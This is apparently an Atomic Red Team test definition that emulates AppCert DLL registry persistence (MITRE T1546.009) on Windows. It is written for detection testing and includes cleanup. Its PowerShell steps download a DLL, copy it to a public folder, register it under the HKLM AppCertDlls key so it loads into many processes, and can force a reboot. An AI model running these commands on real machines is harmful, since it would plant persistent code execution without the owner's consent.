atomic-red-team/atomics/T1546.009/T1546.009.yaml

attack_technique: T1546.009
display_name: 'Event Triggered Execution: AppCert DLLs'
atomic_tests:
- name: Create registry persistence via AppCert DLL
  auto_generated_guid: a5ad6104-5bab-4c43-b295-b4c44c7c6b05
  description: |
    Creates a new 'AtomicTest' value pointing to an AppCert DLL in the AppCertDlls registry key. 
    Once the computer restarted, the DLL will be loaded in multiple processes and write an 
    'AtomicTest.txt' file in C:\Users\Public\ to validate that the DLL executed succesfully.

    Reference: https://skanthak.homepage.t-online.de/appcert.html

  supported_platforms:
  - windows
  input_arguments:
    dll_path:
      description: path of dll to use
      type: path
      default: PathToAtomicsFolder\T1546.009\bin\AtomicTest.dll
    reboot:
      description: Set value to $true if you want to automatically reboot the machine
      type: string
      default: $false
  dependency_executor_name: powershell
  dependencies:
  - description: |
      File to copy must exist on disk at specified location (#{dll_path})
    prereq_command: |
      if (Test-Path "#{dll_path}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{dll_path}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.009/bin/AtomicTest.dll" -OutFile "#{dll_path}"
  executor:
    command: |
      Copy-Item "#{dll_path}" C:\Users\Public\AtomicTest.dll -Force
      reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls" /v "AtomicTest" /t REG_EXPAND_SZ /d "C:\Users\Public\AtomicTest.dll" /f
      if(#{reboot}){Restart-Computer} 
    cleanup_command: |
      reg delete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls" /v "AtomicTest" /f
      Remove-Item C:\Users\Public\AtomicTest.dll -Force
      Remove-Item C:\Users\Public\AtomicTest.txt -Force
    name: powershell
    elevation_required: true